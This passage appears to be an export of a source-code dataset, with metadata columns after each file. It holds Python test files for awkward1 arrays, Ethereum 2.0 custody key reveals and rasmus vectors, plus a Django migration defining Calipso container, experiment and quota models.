assert numpy.asarray(indexedarray.identities).tolist() == [[0], [1], [2], [3], [4], [5], [6], [7]]
assert numpy.asarray(indexedarray.content.identities).tolist() == [[0], [-1], [1], [-1], [2], [7], [3], [6], [4], [5]]
assert isinstance(indexedarray.content.identities, awkward1.layout.Identities64)
def test_passthrough_64():
content = awkward1.layout.NumpyArray(numpy.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9]))
index = awkward1.layout.Index64(numpy.array([0, 2, 4, 6, 8, 9, 7, 5], dtype=numpy.int64))
indexedarray = awkward1.layout.IndexedArray64(index, content)
assert awkward1.to_list(indexedarray) == [0.0, 2.2, 4.4, 6.6, 8.8, 9.9, 7.7, 5.5]
indexedarray.setidentities()
assert numpy.asarray(indexedarray.identities).tolist() == [[0], [1], [2], [3], [4], [5], [6], [7]]
assert numpy.asarray(indexedarray.content.identities).tolist() == [[0], [-1], [1], [-1], [2], [7], [3], [6], [4], [5]]
assert isinstance(indexedarray.content.identities, awkward1.layout.Identities64)
def test_dontpass_32():
content = awkward1.layout.NumpyArray(numpy.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9]))
index = awkward1.layout.Index32(numpy.array([0, 2, 4, 6, 8, 6, 4, 2, 0], dtype=numpy.int32))
indexedarray = awkward1.layout.IndexedArray32(index, content)
assert awkward1.to_list(indexedarray) == [0.0, 2.2, 4.4, 6.6, 8.8, 6.6, 4.4, 2.2, 0.0]
indexedarray.setidentities()
assert numpy.asarray(indexedarray.identities).tolist() == [[0], [1], [2], [3], [4], [5], [6], [7], [8]]
assert indexedarray.content.identities is None
def test_dontpass_U32():
content = awkward1.layout.NumpyArray(numpy.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9]))
index = awkward1.layout.IndexU32(numpy.array([0, 2, 4, 6, 8, 6, 4, 2, 0], dtype=numpy.uint32))
indexedarray = awkward1.layout.IndexedArrayU32(index, content)
assert awkward1.to_list(indexedarray) == [0.0, 2.2, 4.4, 6.6, 8.8, 6.6, 4.4, 2.2, 0.0]
indexedarray.setidentities()
assert numpy.asarray(indexedarray.identities).tolist() == [[0], [1], [2], [3], [4], [5], [6], [7], [8]]
assert indexedarray.content.identities is None
def test_dontpass_64():
content = awkward1.layout.NumpyArray(numpy.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9]))
index = awkward1.layout.Index64(numpy.array([0, 2, 4, 6, 8, 6, 4, 2, 0], dtype=numpy.int64))
indexedarray = awkward1.layout.IndexedArray64(index, content)
assert awkward1.to_list(indexedarray) == [0.0, 2.2, 4.4, 6.6, 8.8, 6.6, 4.4, 2.2, 0.0]
indexedarray.setidentities()
assert numpy.asarray(indexedarray.identities).tolist() == [[0], [1], [2], [3], [4], [5], [6], [7], [8]]
assert indexedarray.content.identities is None
| 55.060241
| 122
| 0.641138
| 748
| 4,570
| 3.885027
| 0.108289
| 0.115623
| 0.052994
| 0.013765
| 0.878183
| 0.878183
| 0.878183
| 0.878183
| 0.878183
| 0.855127
| 0
| 0.123878
| 0.146827
| 4,570
| 82
| 123
| 55.731707
| 0.621441
| 0.019037
| 0
| 0.650794
| 0
| 0
| 0.014506
| 0
| 0
| 0
| 0
| 0
| 0.349206
| 1
| 0.111111
| false
| 0.095238
| 0.079365
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
fb9157f2f12d3da35237746c06c0e90b1955f559
| 4,088
|
py
|
Python
|
tests/core/pyspec/eth2spec/test/phase_1/block_processing/test_process_custody_key_reveal.py
|
Leibniz137/eth2.0-specs
|
e11267952f834d7242d99d305cdcc969f35dbf6d
|
[
"CC0-1.0"
] | 1
|
2021-04-06T23:29:39.000Z
|
2021-04-06T23:29:39.000Z
|
tests/core/pyspec/eth2spec/test/phase_1/block_processing/test_process_custody_key_reveal.py
|
Leibniz137/eth2.0-specs
|
e11267952f834d7242d99d305cdcc969f35dbf6d
|
[
"CC0-1.0"
] | null | null | null |
tests/core/pyspec/eth2spec/test/phase_1/block_processing/test_process_custody_key_reveal.py
|
Leibniz137/eth2.0-specs
|
e11267952f834d7242d99d305cdcc969f35dbf6d
|
[
"CC0-1.0"
] | 1
|
2021-12-25T16:41:24.000Z
|
2021-12-25T16:41:24.000Z
|
from eth2spec.test.helpers.custody import get_valid_custody_key_reveal
from eth2spec.test.context import (
with_all_phases_except,
spec_state_test,
expect_assertion_error,
always_bls,
)
def run_custody_key_reveal_processing(spec, state, custody_key_reveal, valid=True):
"""
Run ``process_custody_key_reveal``, yielding:
- pre-state ('pre')
- custody_key_reveal ('custody_key_reveal')
- post-state ('post').
If ``valid == False``, run expecting ``AssertionError``
"""
yield 'pre', state
yield 'custody_key_reveal', custody_key_reveal
if not valid:
expect_assertion_error(lambda: spec.process_custody_key_reveal(state, custody_key_reveal))
yield 'post', None
return
revealer_index = custody_key_reveal.revealer_index
pre_next_custody_secret_to_reveal = \
state.validators[revealer_index].next_custody_secret_to_reveal
pre_reveal_lateness = state.validators[revealer_index].max_reveal_lateness
spec.process_custody_key_reveal(state, custody_key_reveal)
post_next_custody_secret_to_reveal = \
state.validators[revealer_index].next_custody_secret_to_reveal
post_reveal_lateness = state.validators[revealer_index].max_reveal_lateness
assert post_next_custody_secret_to_reveal == pre_next_custody_secret_to_reveal + 1
if spec.get_current_epoch(state) > spec.get_randao_epoch_for_custody_period(
pre_next_custody_secret_to_reveal,
revealer_index
) + spec.EPOCHS_PER_CUSTODY_PERIOD:
assert post_reveal_lateness > 0
if pre_reveal_lateness == 0:
assert post_reveal_lateness == spec.get_current_epoch(state) - spec.get_randao_epoch_for_custody_period(
pre_next_custody_secret_to_reveal,
revealer_index
) - spec.EPOCHS_PER_CUSTODY_PERIOD
else:
if pre_reveal_lateness > 0:
assert post_reveal_lateness < pre_reveal_lateness
yield 'post', state
@with_all_phases_except(['phase0'])
@spec_state_test
@always_bls
def test_success(spec, state):
state.slot += spec.EPOCHS_PER_CUSTODY_PERIOD * spec.SLOTS_PER_EPOCH
custody_key_reveal = get_valid_custody_key_reveal(spec, state)
yield from run_custody_key_reveal_processing(spec, state, custody_key_reveal)
@with_all_phases_except(['phase0'])
@spec_state_test
@always_bls
def test_reveal_too_early(spec, state):
custody_key_reveal = get_valid_custody_key_reveal(spec, state)
yield from run_custody_key_reveal_processing(spec, state, custody_key_reveal, False)
@with_all_phases_except(['phase0'])
@spec_state_test
@always_bls
def test_wrong_period(spec, state):
custody_key_reveal = get_valid_custody_key_reveal(spec, state, period=5)
yield from run_custody_key_reveal_processing(spec, state, custody_key_reveal, False)
@with_all_phases_except(['phase0'])
@spec_state_test
@always_bls
def test_late_reveal(spec, state):
state.slot += spec.EPOCHS_PER_CUSTODY_PERIOD * spec.SLOTS_PER_EPOCH * 3 + 150
custody_key_reveal = get_valid_custody_key_reveal(spec, state)
yield from run_custody_key_reveal_processing(spec, state, custody_key_reveal)
@with_all_phases_except(['phase0'])
@spec_state_test
@always_bls
def test_double_reveal(spec, state):
state.slot += spec.EPOCHS_PER_CUSTODY_PERIOD * spec.SLOTS_PER_EPOCH * 2
custody_key_reveal = get_valid_custody_key_reveal(spec, state)
_, _, _ = run_custody_key_reveal_processing(spec, state, custody_key_reveal)
yield from run_custody_key_reveal_processing(spec, state, custody_key_reveal, False)
@with_all_phases_except(['phase0'])
@spec_state_test
@always_bls
def test_max_decrement(spec, state):
state.slot += spec.EPOCHS_PER_CUSTODY_PERIOD * spec.SLOTS_PER_EPOCH * 3 + 150
custody_key_reveal = get_valid_custody_key_reveal(spec, state)
_, _, _ = run_custody_key_reveal_processing(spec, state, custody_key_reveal)
custody_key_reveal2 = get_valid_custody_key_reveal(spec, state)
yield from run_custody_key_reveal_processing(spec, state, custody_key_reveal2)
| 34.352941
| 116
| 0.769569
| 568
| 4,088
| 5.022887
| 0.128521
| 0.150719
| 0.229933
| 0.088328
| 0.827199
| 0.81353
| 0.767613
| 0.767613
| 0.767613
| 0.66176
| 0
| 0.006926
| 0.152397
| 4,088
| 118
| 117
| 34.644068
| 0.81645
| 0.047456
| 0
| 0.475
| 0
| 0
| 0.016831
| 0
| 0
| 0
| 0
| 0
| 0.075
| 1
| 0.0875
| false
| 0
| 0.025
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fb9783619738b92d5df58ff54d4fd02a226e04e1
| 23,051
|
py
|
Python
|
apprest/migrations/0001_initial.py
|
dsanchez-cells/calipsoplus-backend
|
7eaa6904ec59d88052644b31041b92ee20e54354
|
[
"MIT"
] | 4
|
2018-12-04T15:08:27.000Z
|
2019-04-11T09:49:41.000Z
|
apprest/migrations/0001_initial.py
|
dsanchez-cells/calipsoplus-backend
|
7eaa6904ec59d88052644b31041b92ee20e54354
|
[
"MIT"
] | 63
|
2018-11-22T13:07:56.000Z
|
2021-06-10T20:55:58.000Z
|
apprest/migrations/0001_initial.py
|
dsanchez-cells/calipsoplus-backend
|
7eaa6904ec59d88052644b31041b92ee20e54354
|
[
"MIT"
] | 10
|
2018-11-23T08:17:28.000Z
|
2022-01-15T23:41:59.000Z
|
# Generated by Django 2.0.2 on 2018-11-06 12:40
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='GuacamoleConnection',
fields=[
('connection_id', models.AutoField(primary_key=True, serialize=False)),
('connection_name', models.CharField(max_length=128)),
('protocol', models.CharField(max_length=32)),
('proxy_port', models.IntegerField(blank=True, null=True)),
('proxy_hostname', models.CharField(blank=True, max_length=512, null=True)),
('proxy_encryption_method', models.CharField(blank=True, max_length=4, null=True)),
('max_connections', models.IntegerField(blank=True, null=True)),
('max_connections_per_user', models.IntegerField(blank=True, null=True)),
('connection_weight', models.IntegerField(blank=True, null=True)),
('failover_only', models.IntegerField()),
],
options={
'managed': False,
'db_table': 'guacamole_connection',
},
),
migrations.CreateModel(
name='GuacamoleConnectionGroup',
fields=[
('connection_group_id', models.AutoField(primary_key=True, serialize=False)),
('connection_group_name', models.CharField(max_length=128)),
('type', models.CharField(max_length=14)),
('max_connections', models.IntegerField(blank=True, null=True)),
('max_connections_per_user', models.IntegerField(blank=True, null=True)),
('enable_session_affinity', models.IntegerField()),
],
options={
'managed': False,
'db_table': 'guacamole_connection_group',
},
),
migrations.CreateModel(
name='GuacamoleConnectionParameter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('parameter_name', models.CharField(max_length=128)),
('parameter_value', models.CharField(max_length=4096)),
],
options={
'managed': False,
'db_table': 'guacamole_connection_parameter',
},
),
migrations.CreateModel(
name='GuacamoleConnectionPermission',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('permission', models.CharField(max_length=10)),
],
options={
'managed': False,
'db_table': 'guacamole_connection_permission',
},
),
migrations.CreateModel(
name='GuacamoleUser',
fields=[
('user_id', models.AutoField(primary_key=True, serialize=False)),
('username', models.CharField(max_length=128, unique=True)),
('password_hash', models.BinaryField()),
('password_salt', models.BinaryField(blank=True, null=True)),
('password_date', models.DateTimeField()),
('disabled', models.IntegerField()),
('expired', models.IntegerField()),
('access_window_start', models.TimeField(blank=True, null=True)),
('access_window_end', models.TimeField(blank=True, null=True)),
('valid_from', models.DateField(blank=True, null=True)),
('valid_until', models.DateField(blank=True, null=True)),
('timezone', models.CharField(blank=True, max_length=64, null=True)),
('full_name', models.CharField(blank=True, max_length=256, null=True)),
('email_address', models.CharField(blank=True, max_length=256, null=True)),
('organization', models.CharField(blank=True, max_length=256, null=True)),
('organizational_role', models.CharField(blank=True, max_length=256, null=True)),
],
options={
'managed': False,
'db_table': 'guacamole_user',
},
),
migrations.CreateModel(
name='CalipsoAvailableImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('public_name', models.CharField(max_length=255, unique=True)),
('image', models.CharField(max_length=255)),
('docker_daemon', models.CharField(default='', max_length=255)),
('host_domain', models.CharField(default='', max_length=255)),
('port_hook', models.CharField(max_length=255)),
('logs_er', models.CharField(max_length=255)),
('protocol', models.CharField(max_length=25)),
('cpu', models.IntegerField()),
('memory', models.CharField(max_length=100)),
('hdd', models.CharField(max_length=100)),
],
options={
'db_table': 'calipso_images',
},
),
migrations.CreateModel(
name='CalipsoContainer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('calipso_user', models.CharField(max_length=255)),
('calipso_experiment', models.CharField(max_length=255)),
('container_id', models.CharField(max_length=255)),
('container_name', models.CharField(max_length=255)),
('container_status', models.CharField(max_length=25)),
('container_info', models.TextField()),
('container_logs', models.TextField()),
('guacamole_username', models.CharField(blank=True, max_length=255)),
('guacamole_password', models.CharField(blank=True, max_length=255)),
('vnc_password', models.CharField(blank=True, max_length=255)),
('creation_date', models.DateTimeField(blank=True, default=django.utils.timezone.now)),
('host_port', models.CharField(blank=True, max_length=255)),
('public_name', models.CharField(default='default', max_length=255)),
],
options={
'db_table': 'calipso_containers',
},
),
migrations.CreateModel(
name='CalipsoExperiment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('subject', models.CharField(max_length=255)),
('body', models.TextField()),
('serial_number', models.CharField(blank=True, max_length=50)),
('beam_line', models.CharField(blank=True, max_length=200)),
],
options={
'db_table': 'calipso_experiments',
},
),
migrations.CreateModel(
name='CalipsoFacility',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('description', models.TextField()),
('url', models.CharField(max_length=2083)),
],
options={
'db_table': 'calipso_facilities',
},
),
migrations.CreateModel(
name='CalipsoSession',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('session_number', models.CharField(blank=True, max_length=50)),
('start_date', models.DateTimeField(blank=True, null=True)),
('end_date', models.DateTimeField(blank=True, null=True)),
('subject', models.CharField(max_length=255)),
('body', models.TextField()),
('data_set_path', models.CharField(max_length=255)),
('experiment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sessions', to='apprest.CalipsoExperiment')),
],
options={
'db_table': 'calipso_sessions',
},
),
migrations.CreateModel(
name='CalipsoUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('calipso_uid', models.UUIDField(default=uuid.uuid4, editable=False, unique=True)),
('bio', models.TextField(blank=True, max_length=500)),
('location', models.CharField(blank=True, max_length=30)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='profile', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'calipso_users',
},
),
migrations.CreateModel(
name='CalipsoUserExperiment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('favorite', models.BooleanField(default=False)),
('calipso_experiment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='apprest.CalipsoExperiment')),
('calipso_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='apprest.CalipsoUser')),
],
options={
'db_table': 'calipso_user_experiment',
},
),
migrations.CreateModel(
name='CalipsoUserQuota',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('max_simultaneous', models.IntegerField(default=5)),
('cpu', models.IntegerField(default=5)),
('memory', models.CharField(default='30G', max_length=100)),
('hdd', models.CharField(default='80G', max_length=100)),
('calipso_user', models.OneToOneField(blank=True, on_delete=django.db.models.deletion.CASCADE, to='apprest.CalipsoUser')),
],
options={
'db_table': 'calipso_quotas',
},
),
migrations.CreateModel(
name='HistoricalCalipsoAvailableImages',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('public_name', models.CharField(db_index=True, max_length=255)),
('image', models.CharField(max_length=255)),
('docker_daemon', models.CharField(default='', max_length=255)),
('host_domain', models.CharField(default='', max_length=255)),
('port_hook', models.CharField(max_length=255)),
('logs_er', models.CharField(max_length=255)),
('protocol', models.CharField(max_length=25)),
('cpu', models.IntegerField()),
('memory', models.CharField(max_length=100)),
('hdd', models.CharField(max_length=100)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'get_latest_by': 'history_date',
'ordering': ('-history_date', '-history_id'),
'verbose_name': 'historical calipso available images',
},
),
migrations.CreateModel(
name='HistoricalCalipsoContainer',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('calipso_user', models.CharField(max_length=255)),
('calipso_experiment', models.CharField(max_length=255)),
('container_id', models.CharField(max_length=255)),
('container_name', models.CharField(max_length=255)),
('container_status', models.CharField(max_length=25)),
('container_info', models.TextField()),
('container_logs', models.TextField()),
('guacamole_username', models.CharField(blank=True, max_length=255)),
('guacamole_password', models.CharField(blank=True, max_length=255)),
('vnc_password', models.CharField(blank=True, max_length=255)),
('creation_date', models.DateTimeField(blank=True, default=django.utils.timezone.now)),
('host_port', models.CharField(blank=True, max_length=255)),
('public_name', models.CharField(default='default', max_length=255)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'get_latest_by': 'history_date',
'ordering': ('-history_date', '-history_id'),
'verbose_name': 'historical calipso container',
},
),
migrations.CreateModel(
name='HistoricalCalipsoExperiment',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('subject', models.CharField(max_length=255)),
('body', models.TextField()),
('serial_number', models.CharField(blank=True, max_length=50)),
('beam_line', models.CharField(blank=True, max_length=200)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'get_latest_by': 'history_date',
'ordering': ('-history_date', '-history_id'),
'verbose_name': 'historical calipso experiment',
},
),
migrations.CreateModel(
name='HistoricalCalipsoFacility',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('description', models.TextField()),
('url', models.CharField(max_length=2083)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'get_latest_by': 'history_date',
'ordering': ('-history_date', '-history_id'),
'verbose_name': 'historical calipso facility',
},
),
migrations.CreateModel(
name='HistoricalCalipsoSession',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('session_number', models.CharField(blank=True, max_length=50)),
('start_date', models.DateTimeField(blank=True, null=True)),
('end_date', models.DateTimeField(blank=True, null=True)),
('subject', models.CharField(max_length=255)),
('body', models.TextField()),
('data_set_path', models.CharField(max_length=255)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('experiment', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='apprest.CalipsoExperiment')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'get_latest_by': 'history_date',
'ordering': ('-history_date', '-history_id'),
'verbose_name': 'historical calipso session',
},
),
migrations.CreateModel(
name='HistoricalCalipsoUser',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('calipso_uid', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False)),
('bio', models.TextField(blank=True, max_length=500)),
('location', models.CharField(blank=True, max_length=30)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('user', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'get_latest_by': 'history_date',
'ordering': ('-history_date', '-history_id'),
'verbose_name': 'historical calipso user',
},
),
migrations.CreateModel(
name='HistoricalCalipsoUserExperiment',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('favorite', models.BooleanField(default=False)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('calipso_experiment', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='apprest.CalipsoExperiment')),
('calipso_user', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='apprest.CalipsoUser')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'get_latest_by': 'history_date',
'ordering': ('-history_date', '-history_id'),
'verbose_name': 'historical calipso user experiment',
},
),
migrations.CreateModel(
name='HistoricalCalipsoUserQuota',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('max_simultaneous', models.IntegerField(default=5)),
('cpu', models.IntegerField(default=5)),
('memory', models.CharField(default='30G', max_length=100)),
('hdd', models.CharField(default='80G', max_length=100)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('calipso_user', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='apprest.CalipsoUser')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'get_latest_by': 'history_date',
'ordering': ('-history_date', '-history_id'),
'verbose_name': 'historical calipso user quota',
},
),
migrations.AddField(
model_name='calipsoexperiment',
name='calipso_users',
field=models.ManyToManyField(through='apprest.CalipsoUserExperiment', to='apprest.CalipsoUser'),
),
migrations.AlterUniqueTogether(
name='calipsouserexperiment',
unique_together={('calipso_user', 'calipso_experiment')},
),
]
| 56.359413
| 200
| 0.573988
| 2,175
| 23,051
| 5.870805
| 0.101609
| 0.065549
| 0.069074
| 0.092098
| 0.809852
| 0.799906
| 0.757538
| 0.741248
| 0.731772
| 0.694886
| 0
| 0.016738
| 0.276864
| 23,051
| 408
| 201
| 56.497549
| 0.749295
| 0.001952
| 0
| 0.688279
| 1
| 0
| 0.184055
| 0.038211
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.017456
| 0.012469
| 0
| 0.022444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fb9ef2c2d84a411e1f0543f7b70267b66af684b1
| 75
|
py
|
Python
|
settings/__init__.py
|
aq1/vkPostman
|
db6b8d387d484ff53d12dcaf77ba3dcaa6da3822
|
[
"MIT"
] | 1
|
2020-09-14T04:47:31.000Z
|
2020-09-14T04:47:31.000Z
|
settings/__init__.py
|
aq1/vkPostman
|
db6b8d387d484ff53d12dcaf77ba3dcaa6da3822
|
[
"MIT"
] | null | null | null |
settings/__init__.py
|
aq1/vkPostman
|
db6b8d387d484ff53d12dcaf77ba3dcaa6da3822
|
[
"MIT"
] | null | null | null |
from settings.settings_base import *
from settings.settings_local import *
| 25
| 37
| 0.84
| 10
| 75
| 6.1
| 0.5
| 0.393443
| 0.655738
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 75
| 2
| 38
| 37.5
| 0.910448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fba9c833ed676ffa30ded1ec700c726b454cd6a8
| 1,247
|
py
|
Python
|
test/rasmus/test_vector.py
|
Open-Technology/Computational-Biology
|
f7628900f2d1d9ade60d7ad94f6b3d1022c92cb7
|
[
"MIT"
] | 30
|
2015-05-08T19:21:15.000Z
|
2022-03-11T21:30:33.000Z
|
test/rasmus/test_vector.py
|
Open-Technology/Computational-Biology
|
f7628900f2d1d9ade60d7ad94f6b3d1022c92cb7
|
[
"MIT"
] | null | null | null |
test/rasmus/test_vector.py
|
Open-Technology/Computational-Biology
|
f7628900f2d1d9ade60d7ad94f6b3d1022c92cb7
|
[
"MIT"
] | 8
|
2015-05-08T02:02:33.000Z
|
2021-06-10T17:51:03.000Z
|
import unittest
from rasmus import vector as v
class Test (unittest.TestCase):
def test_list(self):
a = [1.0, 2.0, 3.0]
b = [4.0, 5.0, 6.0]
self.assertEqual(v.vadd(a, b),
[5.0, 7.0, 9.0])
self.assertEqual(v.vsub(a, b),
[-3.0, -3.0, -3.0])
self.assertEqual(v.vmul(a, b),
[4.0, 10.0, 18.0])
self.assertEqual(v.vdiv(a, b),
[0.25, 0.4, 0.5])
self.assertAlmostEqual(v.vmag(a), 3.74165738677)
self.assertAlmostEqual(v.vdist(a, b), 5.19615242271)
def _test_dict(self):
a = {'x': 1.0, 'y': 2.0, 'z': 3.0}
b = {'x': 4.0, 'y': 5.0, 'z': 6.0}
self.assertEqual(v.vadd(a, b),
dict(zip('xyz', [5.0, 7.0, 9.0])))
self.assertEqual(v.vsub(a, b),
dict(zip('xyz', [-3.0, -3.0, -3.0])))
self.assertEqual(v.vmul(a, b),
dict(zip('xyz', [4.0, 10.0, 18.0])))
self.assertEqual(v.vdiv(a, b),
dict(zip('xyz', [0.25, 0.4, 0.5])))
self.assertAlmostEqual(v.vmag(a), 3.74165738677)
self.assertAlmostEqual(v.vdist(a, b), 5.19615242271)
| 33.702703
| 62
| 0.44988
| 192
| 1,247
| 2.90625
| 0.223958
| 0.035842
| 0.229391
| 0.243728
| 0.777778
| 0.706093
| 0.706093
| 0.706093
| 0.620072
| 0.620072
| 0
| 0.155748
| 0.351243
| 1,247
| 36
| 63
| 34.638889
| 0.533993
| 0
| 0
| 0.413793
| 0
| 0
| 0.014435
| 0
| 0
| 0
| 0
| 0
| 0.413793
| 1
| 0.068966
| false
| 0
| 0.068966
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8399ef8c76c8e673126b50411dbfe092a2663e03
| 2,548
|
py
|
Python
|
livestyled/models/tests/test_form_field.py
|
andrelopez/python-sdk
|
3c83d4698ecf6b5b59003d20cb26644e0dd77f61
|
[
"MIT"
] | null | null | null |
livestyled/models/tests/test_form_field.py
|
andrelopez/python-sdk
|
